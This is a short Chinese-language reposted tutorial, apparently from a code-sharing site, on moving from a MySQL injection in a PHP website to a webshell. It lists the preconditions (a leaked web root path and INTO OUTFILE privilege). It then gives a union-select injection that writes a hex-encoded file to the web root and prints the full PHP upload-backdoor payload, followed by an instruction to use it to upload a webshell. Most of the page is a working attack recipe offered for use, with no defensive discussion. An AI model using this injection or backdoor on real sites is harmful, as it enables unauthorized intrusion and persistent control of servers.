關於MySQL注入漏洞到獲取webshell


關於PHP網站報錯性注入拿shell的方法,定位到報錯在某個字段上的利用方式:

條件1: 爆出了網站的物理路徑

條件2:MySQL具有into outfile權限

 

SQL語句為:

假如字段為2:

union+select+1,payload的十六進制,3,4,5+into+outfile+'/var/www/html/data/1.php';

 

payload:

<?php echo 'Uploader<br>';echo '<br>';echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload !!!</b><br><br>'; }else { echo '<b>Upload !!!</b><br><br>'; }}?>

 

訪問1.PHP上傳webshell即可。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM